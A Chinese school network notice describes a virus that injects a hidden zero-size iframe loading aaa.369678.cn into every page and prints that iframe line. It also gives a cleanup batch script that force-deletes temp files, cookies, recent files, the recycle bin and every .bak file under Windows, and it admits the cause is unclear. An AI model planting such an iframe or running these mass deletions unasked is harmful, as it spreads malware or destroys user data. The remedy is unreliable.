最近学校网络出现一种特殊的病毒,利用系统漏洞攻击局域网的内部电脑,可以影响自己和其他电脑的运行速度,占据大量的网络带宽,现将处理办法公布,希望大家及时升级病毒库,保证自己的网络安全。
一、清理aaa.369678.cn病毒。
【表现症状】
此病毒非常可恶,它会让你的IE浏览器每次打开网站的时候都连接到 aaa.369678.cn 网站,并且从这个网站下载多种木马、病毒,让你现有杀毒软件(卡巴斯基、avest等)不断地跳出病毒提示,严重拖慢浏览速度,并最终导致IE崩溃。
分析网页代码,发现每个页面都有如下代码:
<iframe src="http://aaa.369678.cn/****.htm" width="0" height="0"></iframe>
用“奇虎360”、超级兔子等常规软件扫描,没有发现异常。 可每次开IE浏览的时候都会如此。上网找了一些资料后才把它摆平。
【解决办法】
1、进入系统的安全模式(注意:是不带网络连接的)
如果你的安全模式被破坏,请用System Repair Engineer修复你的安全模式。
2、打开“任务管理器”
3、把以下内容复制或者新建一个批处理文件:
@echo off
echo 正在清理,请稍等......
rd /s /q %windir%\temp & md %windir%\temp
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
rd /s /q %windir%\temp & md %windir%\temp
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
rd /s/q %temp% & md %temp%
rd /s/q "%userprofile%\Local Settings\Temporary Internet Files"
直接下载
upload/2007_09/07092409205560.rar
4、在“任务管理器”的“进程”页面,结束Explorer.exe 进程,然后把上面 3、的命令黏贴到命令行方式执行或者保存为批处理文件再执行!
5、收工。
【备注】此病毒有点特别,工作原理还不是很清楚,好像不是浏览器劫持,全面修复IE后依然无效。估计是网络内部有电脑中毒了,然后利用系统的漏洞不断攻击其他电脑。
正版瑞星半年杀毒软件下载 http://www.rising.com.cn/
注意:杀毒软件只能装一个,如果你有卡巴斯基,就不用装瑞星,用瑞星,就不要做诺顿,否则电脑会非常的缓慢。
